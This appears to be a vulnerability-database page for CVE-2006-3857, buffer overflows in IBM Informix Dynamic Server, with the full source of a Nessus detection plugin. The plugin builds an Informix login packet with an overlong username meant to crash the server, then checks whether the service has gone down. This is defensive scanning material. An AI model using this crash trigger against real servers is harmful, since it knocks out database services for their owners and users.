Vulnerabilities > CVE-2006-3857 - Multiple vulnerability in IBM Informix Dynamic Server

047910
CVSS 6.5 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
SINGLE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
ibm
nessus

Summary

Multiple buffer overflows in IBM Informix Dynamic Server (IDS) before 9.40.TC6 and 10.00 before 10.00.TC3 allow remote authenticated users to execute arbitrary code via (1) the getname function, as used by (a) _sq_remview, (b) _sq_remproc, (c) _sq_remperms, (d) _sq_distfetch, and (e) _sq_dcatalog; and the (2) SET DEBUG FILE, (3) IFX_FILE_TO_FILE, (4) FILETOCLOB, (5) LOTOFILE, and (6) DBINFO functions (product defect IDs 171649, 171367, 171387, 171391, 171906, 172179).

Nessus

NASL familyGain a shell remotely
NASL idINFORMIX_IDS_MULT_VULNS.NASL
descriptionThe version of Informix Dynamic Server installed on the remote host contains multiple vulnerabilities that may allow attackers to execute arbitrary code, gain elevated privileges, uncover sensitive information, deny service to legitimate users, etc. Some of these issues can be exploited remotely without authentication.
last seen2020-06-01
modified2020-06-02
plugin id22229
published2006-08-16
reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/22229
titleInformix Dynamic Server Multiple Remote Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#



include("compat.inc");

if (description)
{
  script_id(22229);
  script_version("1.12");

  script_cve_id("CVE-2006-3853", "CVE-2006-3855", "CVE-2006-3856", "CVE-2006-3857",
                "CVE-2006-3858", "CVE-2006-3860", "CVE-2006-3861", "CVE-2006-3862");
  script_bugtraq_id(19264);

  script_name(english:"Informix Dynamic Server Multiple Remote Vulnerabilities");
  script_summary(english:"Tries to crash Informix Dynamic Server with a long username");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote host contains an application that is affected by several
vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The version of Informix Dynamic Server installed on the remote host
contains multiple vulnerabilities that may allow attackers to execute
arbitrary code, gain elevated privileges, uncover sensitive
information, deny service to legitimate users, etc.  Some of these
issues can be exploited remotely without authentication." );
 script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg21242921" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to Informix 10.00.xC4 / 9.40.xD8 / 7.31.xD9 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/08/16");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/07/31");
 script_cvs_date("Date: 2018/07/12 19:01:15");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");
  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
  script_dependencies("informix_detect.nasl");
  script_require_ports("Services/informix", 1526);

  exit(0);
}


include("byte_func.inc");
include("misc_func.inc");


port = get_kb_item("Services/informix");
if (!port) port = 1526;
if (!get_port_state(port)) exit(0);


soc = open_sock_tcp(port);
if (!soc) exit(0);


# Try to log in with a long username.
user = crap(0x410);
pass = SCRIPT_NAME;
db = "sysmaster";
dbpath = "ol_nessus";
zero = raw_string(0x00);

req = raw_string(
  "sq",                                # header
  crap(8),                             # length + constant (to be filled in later)
  "sqlexec ",                          # magic
  user, " -p", pass, " ",              # credentials
  "9.22.TC1   ",                       # client version
  "RDS#N000000 ",                      # RDS
  "-d", db, " ",                       # database
  "-fIEEEI ",                          # IEEE
  "DBPATH=//", dbpath, " ",            # dbpath
  "CLIENT_LOCALE=en_US.CP1252 ",       # client locale
  "DB_LOCALE=en_US.819 ",              # db locale
  ":",
  "AG0AAAA9b3IAAAAAAAAAAAA9c29jdGNwAAAAAAABAAABMQAAAAAAAAAAc3FsZXh",
  "lYwAAAAAAAAVzcWxpAAACAAAAAwAKb2xfbmVzc3VzAABrAAAAAAAAnmUAAAAAAA",
  "duZXNzdXMAAAduZXNzdXMAAC1DOlxQcm9ncmFtIEZpbGVzXE5lc3N1c1xpbmZvc",
  "m1peF9kZXRlY3QubmFzbAAAdAAIAAAE0gAAAAAAfwo="
);
req = insstr(req, base64(str:raw_string(mkword(strlen(req)-4), 0x01, 0x3d, zero, zero)), 2, 9);

send(socket:soc, data:req);
res = recv(socket:soc, length:4096, timeout:20);
close(soc);


# If we didn't get a response...
if (isnull(res))
{
  # Check for a bit to see if it's down.
  max_tries = 3;
  for (try=0; try<max_tries; try++)
  {
    sleep(5);
    soc = open_sock_tcp(port);
    if (soc) close(soc);
    else
    {
      security_hole(port);
      exit(0);
    }
  }
}